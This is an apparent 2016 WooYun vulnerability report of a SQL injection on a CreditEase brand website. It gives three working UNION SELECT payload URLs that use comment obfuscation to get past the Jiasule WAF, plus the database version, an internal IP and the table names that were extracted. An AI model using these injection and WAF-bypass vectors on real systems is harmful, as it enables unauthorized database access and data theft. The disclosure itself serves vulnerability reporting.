当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186614

漏洞标题:宜信某站SQL注入绕过加速乐

相关厂商:宜信

漏洞作者: 学习委员

提交时间:2016-03-19 19:19

修复时间:2016-05-04 18:15

公开时间:2016-05-04 18:15

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-19: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经确认,细节仅向厂商公开
2016-03-30: 细节向核心白帽子及相关领域专家公开
2016-04-09: 细节向普通白帽子公开
2016-04-19: 细节向实习白帽子公开
2016-05-04: 细节向公众公开

简要描述:

我知道这次可能上不了首页了。但是看在我花了三天时间过加速乐的份上给我全额RANK\WB吧 (^ωω^)

详细说明:

受影响站点:http://brand.creditease.cn(和 brcms.yixin.com 指向同一站点)
概述:本来发现三处注入的,但是一觉醒来有两处不见了(出问题的文件被删除了)。本来想找真实IP绑定hosts 访问的,奈何没找到,只能苦逼的走上绕 加速乐 的路,痛并快乐着。

fuck.png


出问题的URL:http://brand.creditease.cn/activity-single.htm?id=22

给出过 加速乐 的几个Vector:
(1)http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(user/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
(2)http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(`version`/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
(3)http://brand.creditease.cn/activity-single.htm?id=225.0UNION /*!34000select-1.0%0a*/ ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,(table_name) from`information_schema`.`tables`where`table_schema`='viweb' limit 0,1%23


跑出点数据证明一下(详细数据不跑):

version() 和 user()
mysql 5.5.18.1-log
viweb@10.171.198.115


数据库
information_schema
mysql
performance_schema
viweb


数据表
activity
activity_agenda
activity_agenda2
activity_awards
activity_day
activity_honored_guest
activity_honored_guest_talk
activity_phases
activity_signup
activity_watch
file
file_type
interactive
interactive_honored_guest
interactive_votee
interactive_voter
interactive_watch
page_main
product
product_category
product_content
user_admin
user_info
user_other
user_pw_by_mail
user_safe
vi
vi_file
vi_file_category
vi_first_menu
vi_second_menu
z
z_state
z_type

漏洞证明:

已证明如上

修复方案:

不能太依赖 waf

版权声明:转载请注明来源 学习委员@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-20 18:15

厂商回复:

漏洞已确认,安排修复中。感谢白帽子提醒。
白帽子奖励正在申请中。。。

最新状态:

暂无